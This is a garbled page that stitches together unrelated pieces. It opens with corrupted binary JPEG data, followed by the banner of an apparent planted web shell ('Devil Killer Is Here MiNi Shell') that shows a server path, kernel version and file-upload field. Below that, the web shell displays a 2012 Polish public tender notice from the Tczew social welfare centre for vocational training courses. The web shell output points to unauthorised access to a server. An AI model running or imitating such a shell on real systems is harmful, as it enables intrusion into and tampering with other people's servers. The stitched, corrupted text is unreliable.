JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120919/354724-N-2012.html

<p class="kh_header"><b>Tczew: Usługę szkolenia w zakresie przeprowadzenia kursu zawodowego z przeszkoleniem z BHP i kursem pierwszej pomocy przedmedycznej</b><br>
<b>Numer ogłoszenia: 354724 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Armii Krajowej 39, 83-110 Tczew, woj. pomorskie, tel. 058 7770020, faks 058 5326003.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wrotapomorza.pl/pl/bip/gminy/tczew-miasto/mops_tczew</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługę szkolenia w zakresie przeprowadzenia kursu zawodowego z przeszkoleniem z BHP i kursem pierwszej pomocy przedmedycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa polega na przeprowadzeniu kursów zawodowych w celu uzyskania zawodu-przygotowania zawodowego wraz z przeszkoleniem z BHP i kursem pierwszej pomocy przedmedycznej na rzecz uczestników/czek projektu pn. Akademia Aktywnych - rozwój i upowszechnienie aktywnej integracji przez Miejski Ośrodek Pomocy Społecznej w Tczewie w ramach instrumentu aktywnej integracji edukacyjnej.
Przez kurs zawodowy należy rozumieć kurs umożliwiający uzyskiwanie i uzupełnianie wiedzy, umiejętności i kwalifikacji zawodowych zgodnie z §3  pkt.5 Rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 w sprawie kształcenia ustawicznego w formach pozaszkolnych. -Dz. U. z 2012 poz. 186.
Program kursu realizowany jest wg programów nauczania przez podmiot działający zgodnie z Ustawą z dnia 7 września 1991 roku o systemie oświaty - Dz.U. z 2004 nr 256 poz. 2572 ze zm  oraz Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 w sprawie kształcenia ustawicznego w formach pozaszkolnych -Dz. U. z 2012 poz. 186.
Wykonawca usługi zobowiązany jest posiadać aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy - tekst jednolity z 2008 roku, Dz. U. Nr 69, poz. 415 z późniejszymi zmianami.
Wykonawca przeprowadzi następujące szkolenia:

OBSŁUGI KAS FISKALNYCH Z GOSPODARKĄ MAGAZYNOWĄ I FAKTUROWANIEM, OBSŁUGĄ TERMINALA PŁATNICZEGO DLA 30 OSÓB
ogólna liczba godzin prowadzonego szkolenia wynosi min. 182 godziny przy założeniu, że każda osoba uczestnicząca w szkoleniu odbędzie  min. 142 godz. szkolenia, a w tym:
-min. 20 godz. szkolenia z zakresu obsługi komputera na poziomie podstawowym, jedna osoba uczestnicząca przy 1 komputerze
-min. 57 godz. z zakresu gospodarki magazynowej, które musi objąć m.in.: praktyczne ćwiczenia obsługi dziedzinowych programów komputerowych powszechnie obowiązujących w pracy na stanowisku magazyniera-ki oraz elementy towaroznawstwa, zasady przyjmowania i wydawania zapasów, towarów, narzędzi etc., zasady inwentaryzacji, gospodarkę opakowaniami, odpowiedzialność materialną w gospodarce magazynowej, obowiązujące zasady ochrony środowiska, wyposażenie techniczne magazynów.
-min. 3 godz. szkolenia z zakresu BHP
-min. 60 godz. z zakresu praktycznej obsługi kas fiskalnych, wykonawca zapewni minimum 1 kasę fiskalną na 2 osob, zawierające także szkolenie obsługi terminala kart płatniczych oraz  fakturowania. Dodatkowo szkolenie powinno zawierać elementy obsługi klienta, przyjmowania reklamacji.
oraz czas przewidywany na egzamin końcowy - 2 godziny,

Szkolenie z zakresu obsługi komputera musi zostać przeprowadzone w podziale na trzy grupy po 10 osób. Szkolenie każdej grupy będzie trwało 20 godz. Dopuszczalne jest prowadzenie zajęć dla więcej niż jednej grupy w tym samym terminie, jednakże w różnych pomieszczeniach przez różne osoby prowadzące.
Szkolenie musi zawierać również teoretyczne i praktyczne przygotowanie do wykonywania pracy na w.w stanowisku.
Wykonawca ponosi koszty zakupu produktów i narzędzi niezbędnych do realizacji zajęć.
Materiały szkoleniowe muszą zawierać podręczniki oraz inne materiały edukacyjne o tematyce szkolenia. Każda osoba ma otrzymać na własność co najmniej jedną książkę i lub wydawnictwo multimedialne wspomagającą obszar tematyczny kursu zawodowego, a także materiały do robienia notatek, co najmniej blok 32 kartkowy w formacie A5 i długopis oraz materiały do zajęć praktycznych. Wykonawca jest zobowiązany do stosowania oznakowania projektu, logotypów i informacji o współfinansowaniu na materiałach dydaktycznych zgodnie ze wzorem zaakceptowanym przez Zamawiającego.

PRACOWNIK GOSPODARCZY Z OBSŁUGĄ WÓZKÓW WIDŁOWYCH DLA 3 OSÓB

ogólna liczba godzin prowadzonego szkolenia wynosi min 189 godziny przy założeniu, każda osoba uczestnicząca w szkoleniu odbędzie min. 159 godzin szkolenia, w tym:
- min 87 godzin w tym 57 godzin praktycznych zajęć z zakresu prac gospodarczych, w tym m.in.: prac porządkowych  i  konserwacyjnych w firmie, obsługi urządzeń używanych przy pracach gospodarczych, postępowania w sytuacji zagrożeń, postawy psychofizycznej pracownika, z uwzględnieniem realizacji obowiązków zgodnie z zasadami ochrony środowiska i ekologii 
- min. 3 godz. szkolenia z zakresu BHP
- min. 67 godz. zajęć z obsługi wózków widłowych, w tym min. 52 godz. zajęć teoretycznych i 15 godz. zajęć praktycznych, dla każdej osoby indywidualnie. Szkolenie musi przygotować osobę uczestniczącą do egzaminu na operatora wózków widłowych przed Urzędem Dozoru Technicznego.
Program szkolenia zakresu obsługi wózków widłowych musi być zakończone teoretyczno-praktycznym egzaminem, poświadczonym zaświadczeniem, nadającym uprawnienia do obsługi wózków widłowych.
- oraz czas przewidywany na egzamin końcowy - 2 godziny,

Wykonawca ponosi koszty zakupu produktów i narzędzi niezbędnych do realizacji zajęć.
Wykonawca wyposaży każdą osobę uczestniczącą w szkoleniu w odzież ochronną i środki czystości.
Wykonawca ponosi koszty zakupu produktów i narzędzi niezbędnych do realizacji zajęć.
Materiały szkoleniowe muszą zawierać podręczniki oraz inne materiały edukacyjne o tematyce szkolenia. Każda osoba ma otrzymać na własność co najmniej jedną książkę i lub wydawnictwo multimedialne wspomagającą obszar tematyczny kursu zawodowego, a także materiały do robienia notatek, co najmniej blok 32 kartkowy w formacie A5 i długopis oraz materiały do zajęć praktycznych. Wykonawca jest zobowiązany do stosowania oznakowania projektu, logotypów i informacji o współfinansowaniu na materiałach dydaktycznych zgodnie ze wzorem zaakceptowanym przez Zamawiającego.
Szkolenie musi zawierać również teoretyczne i praktyczne przygotowanie do wykonywania pracy na w/w stanowisku.

GOSPODARKA MAGAZYNOWA Z OBSŁUGĄ WÓZKÓW WIDŁOWYCH DLA 9 OSÓB

ogólna liczba godzin prowadzonego szkolenia wynosi min.279 godziny przy założeniu, że  każda osoba uczestnicząca w szkoleniu odbędzie min. 159 godz. szkolenia, a w tym:
- min. 20 godz. szkolenia z zakresu obsługi komputera na poziomie podstawowym, jedna osoba uczestnicząca przy 1 komputerze,
- min. 67 godz. z zakresu gospodarki magazynowej, które musi objąć  m.in.: praktyczne ćwiczenia obsługi dziedzinowych programów komputerowych powszechnie obowiązujących w pracy na stanowisku magazyniera-ki oraz elementy towaroznawstwa, zasady przyjmowania i wydawania zapasów towarów, narzędzi etc., zasady inwentaryzacji, gospodarkę opakowaniami, odpowiedzialność materialną w gospodarce magazynowej, obowiązujące zasady ochrony środowiska, wyposażenie techniczne magazynów, magazynowanie substancji niebezpiecznych.  
- min. 3 godz. szkolenia z zakresu BHP.
- min. 67 godz. zajęć z obsługi wózków widłowych, w tym min. 52 godz. zajęć teoretycznych i 15 godz. zajęć praktycznych (dla każdej osoby indywidualnie). Szkolenie musi przygotować osobę uczestniczącą do egzaminu na operatora wózków widłowych przed Urzędem Dozoru Technicznego.
Program szkolenia zakresu obsługi wózków widłowych musi być zakończone teoretyczno-praktycznym egzaminem, poświadczonym zaświadczeniem, nadającym uprawnienia do obsługi wózków widłowych.
- oraz czas przewidywany na egzamin końcowy - 2 godziny,

Wykonawca ponosi koszty zakupu produktów i narzędzi niezbędnych do realizacji zajęć.
Wykonawca wyposaży każdą osobę uczestniczącą w szkoleniu w odzież ochronną 
i środki czystości.
Materiały szkoleniowe muszą zawierać podręczniki oraz inne materiały edukacyjne o tematyce szkolenia. Każda osoba ma otrzymać na własność co najmniej jedną książkę i lub wydawnictwo multimedialne wspomagającą obszar tematyczny kursu zawodowego, a także materiały do robienia notatek, co najmniej blok 32 kartkowy w formacie A5 i długopis oraz materiały do zajęć praktycznych. Wykonawca jest zobowiązany do stosowania oznakowania projektu, logotypów i informacji o współfinansowaniu na materiałach dydaktycznych zgodnie ze wzorem zaakceptowanym przez Zamawiającego.
Szkolenie musi zawierać również teoretyczne i praktyczne przygotowanie do wykonywania pracy na w.w stanowisku
UWAGA!
Zajęcia teoretyczne z zakresu obsługi wózków widłowych mogą być prowadzone łącznie dla osób uczestniczących w szkoleniach: Pracownik gospodarczy z obsługą wózków widłowych i gospodarka magazynowa z obsługą wózków widłowych - łącznie 12 osób.

OPIEKA DOMOWA Z OPIEKĄ NAD DZIEĆMI, OSOBAMI STARSZYMI I NIEPEŁNOSPRAWNYMI DLA 20 OSÓB

Ogólna liczba godzin prowadzonego szkolenia wynosi min. 152 godziny przy założeniu, że  każda osoba uczestnicząca w szkoleniu odbędzie min. 152 godz. szkolenia, a w tym:
-min. 147 godz. nauczania z zakresu opieki nad dziećmi  osobami starszymi i niepełnosprawnymi obejmujący zakres zajęć teoretycznych i co najmniej połowę czasu szkolenia realizację zajęć praktycznych w podmiotach świadczących usługi opiekuńcze dla osób starszych i lub niepełnosprawnych i lub dzieci,
-min. 3 godz. szkolenia z  zakresu BHP
-oraz czas przewidywany na egzamin końcowy - 2 godziny,
Program musi zawierać m.in. wiadomości z zakresu podstaw psychologii, dbania o higienę i estetykę otoczenia podopiecznych, przygotowywania posiłków zgodnie z zaleceniami żywieniowymi dietetycznymi sposobów komunikowania się z dziećmi, osobami starszymi i niepełnosprawnymi fizycznie lub umysłowo, aktywizacji ruchowej dzieci, osób starszych i niepełnosprawnych, zasad żywienia, zasad planowania codziennego jadłospisu zasad wykonywania zabiegów higienicznych dla dzieci, osób starszych i niepełnosprawnych,  w tym leżących. 
Wykonawca ponosi koszty zakupu produktów i narzędzi niezbędnych do realizacji zajęć.
Materiały szkoleniowe muszą zawierać podręczniki oraz inne materiały edukacyjne o tematyce szkolenia. Każda osoba ma otrzymać na własność co najmniej jedną książkę i lub wydawnictwo multimedialne wspomagającą obszar tematyczny kursu zawodowego, a także materiały do robienia notatek, co najmniej blok 32 kartkowy w formacie A5 i długopis oraz materiały do zajęć praktycznych. Wykonawca jest zobowiązany do stosowania oznakowania projektu, logotypów i informacji o współfinansowaniu na materiałach dydaktycznych zgodnie ze wzorem zaakceptowanym przez Zamawiającego.
Szkolenie musi zawierać również teoretyczne i praktyczne przygotowanie do wykonywania pracy na w.w stanowisku

PODSTAWY RACHUNKOWOŚCI Z OBSŁUGĄ PROGRAMÓW KSIĘGOWYCH DLA 2 OSÓB

ogólna liczba godzin prowadzonego szkolenia wynosi min.155 godzin przy założeniu, że  każda osoba uczestnicząca w szkoleniu odbędzie min. 155 godz. szkolenia, a w tym:
- min. 150 godzin obejmujących m.in. zakres: wybrane zagadnienia dotyczące działalności gospodarczej; podstawy rachunkowości; inwestycje krótkoterminowe; rozrachunki i ich ewidencja księgowa; rzeczowe aktywa obrotowe; aktywa trwałe: dokumentacja, amortyzacja, wycena, ewidencja; koszty działalności gospodarczej i ich rozliczenie, wybrane zagadnienia z zakresu ubezpieczeń społecznych,  kalkulacja kosztów; przychody i koszty związane z ich osiągnięciem, ustalenie wyniku finansowego; elementy prawa podatkowego; ewidencja i rozliczanie podatku VAT, rozliczanie ZUS, podatku dochodowego od osób fizycznych i podatku dochodowego od osób prawnych,  prowadzenie uproszczonych form ewidencji księgowej w tym podatkowej księgi przychodów i rozchodów; sprawozdawczość finansowa i podatkowa, kadry i płace, obsługa programów komputerowych powszechnie obowiązujących w pracy na stanowisku księgowego.
Zajęcia będą prowadzone przy użyciu powszechnie obowiązujących w pracy na stanowisku księgowego programów komputerowych
-min. 3 godz. szkolenia z  zakresu BHP
-oraz czas przewidywany na egzamin końcowy - 2 godziny,
Wykonawca ponosi koszty zakupu produktów i narzędzi niezbędnych do realizacji zajęć.
Materiały szkoleniowe muszą zawierać podręczniki oraz inne materiały edukacyjne o tematyce szkolenia. Każda osoba ma otrzymać na własność co najmniej jedną książkę i lub wydawnictwo multimedialne wspomagającą obszar tematyczny kursu zawodowego, a także materiały do robienia notatek, co najmniej blok 32 kartkowy w formacie A5 i długopis oraz materiały do zajęć praktycznych. Wykonawca jest zobowiązany do stosowania oznakowania projektu, logotypów i informacji o współfinansowaniu na materiałach dydaktycznych zgodnie ze wzorem zaakceptowanym przez Zamawiającego.
Szkolenie musi zawierać również teoretyczne i praktyczne przygotowanie do wykonywania pracy na w.w stanowisku

SZKOLENIE Z ZAKRESU PIERWSZEJ POMOCY PRZEDMEDYCZNEJ DLA 64 OSÓB BIORĄCYCH UDZIAŁ KURSACH ZAWODOWYCH WG POWYŻSZEJ SPECYFIKACJI W PODZIALE NA 6 GRUP ,5 GRUP 10- OSOBOWYCH I 1 GRUPA 12-OSOBOWA.
 Dopuszczalne jest prowadzenie zajęć dla więcej niż jednej grupy w tym samym terminie, jednakże w różnych pomieszczeniach przez różne osoby prowadzące.
Ogólna liczba prowadzonego szkolenia wynosi min. 84 godzin przy założeniu, że każda osoba uczestnicząca w szkoleniu odbędzie min. 14 godzin szkolenia w tym:

-szkolenie 12 godz. - obejmuje postępowanie w stanach zagrożenia życia oraz nabycie manualnych umiejętności z zakresu ratownictwa przedmedycznego, między innymi przygotowując  w sposób praktyczny osobę uczestniczącą w szkoleniu do wykonywania zadań w zakresie udzielania pierwszej pomocy na podstawie art. 2091§1 pkt. 2 ustawy z dnia 26 czerwca 1974r. - Kodeks pracy tj. Dz.U. z 1998r. Nr 21 poz. 94 z późn. zm. 
Program musi zawierać między innymi następujące zagadnienia:
- znaczenie pomocy przedmedycznej,
- wyposażenie apteczki pierwszej pomocy,
- ogólne wiadomości o budowie ciała człowieka,
- łańcuch pomocy,
- wstępna ocena stanu poszkodowanego,
- wezwanie służb ratowniczych,
- pierwsza pomoc, wykład, pokaz, ćwiczenia na fantomach - u nieprzytomnych, omdlenia, epilepsja, śpiączka cukrzycowa:
- nagłe zatrzymanie krążenia,
- złamania, skręcenia, zwichnięcia,
- oparzenia, odmrożenia,
- zatrucia pokarmowe,
- zadławienia i zakrztuszenia.
- egzamin - 2 godziny. 
Wykonawca ponosi koszty zakupu produktów i narzędzi niezbędnych do realizacji zajęć.
Wykonawca zapewni wszystkim osobom uczestniczącym w szkoleniu materiały szkoleniowe. Każda osoba ma otrzymywać na własność literaturę wspomagającą tematykę zajęć w formie drukowanej m.in.- drukowany instruktaż pierwszej pomocy oraz film DVD pierwszej pomocy,
a także materiały do robienia notatek, m. innymi zeszyt co najmniej 32 kartkowy i długopis oraz materiały do zajęć praktycznych, w tym apteczkę walizkową w sztywnym opakowaniu i  wyposażeniem zgodnym z normą DIN 13157.
Liczba godzin zajęć przypadających na jedną osobę uczestniczącą w szkoleniu, 12 godzin na osobę uczestniczącą powinna obejmować zakres wiadomości teoretycznych i umiejętności praktycznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.56.20.00-1, 80.55.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 3 do Specyfikacji Istotnych Warunków Zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia (potwierdzonego dokumentem, że zamówienia te zostały wykonane lub są wykonywane należycie) odpowiadające swoim rodzajem i wartościom usługom stanowiącym przedmiot zamówienia, tj. usługi przygotowania i przeprowadzenia szkolenia zawodowego dla co najmniej 30 uczestników; w szkoleniu brało udział co najmniej 2 wykładowców; uczestnicy szkolenia otrzymali drukowane materiały szkoleniowe,  zapewniono posiłki i napoje dla uczestników,  o wartości min. 20.000,00 zł brutto każde zgodnie z treścią załącznika nr 8,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia (potwierdzonego dokumentem, że zamówienia te zostały wykonane lub są wykonywane należycie) odpowiadające swoim rodzajem i wartościom usługom stanowiącym przedmiot zamówienia, tj. usługi przygotowania i przeprowadzenia szkolenia zawodowego dla co najmniej 30 uczestników; w szkoleniu brało udział co najmniej 2 wykładowców; uczestnicy szkolenia otrzymali drukowane materiały szkoleniowe,  zapewniono posiłki i napoje dla uczestników,  o wartości min. 20.000,00 zł brutto każde zgodnie z treścią załącznika nr 8,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej dwoma osobami, które będą uczestniczyć w wykonaniu zamówienia, a które posiadają odpowiednie doświadczenie zawodowe jako wykładowcy szkolenia polegające na wykonywaniu funkcji wykładowcy w co najmniej dwóch zamówieniach z zakresu pkt. 7.1.2. przez każdą osobę, zgodnie z treścią załącznika nr 7</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 20 000,00-zł. (dwadzieścia tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
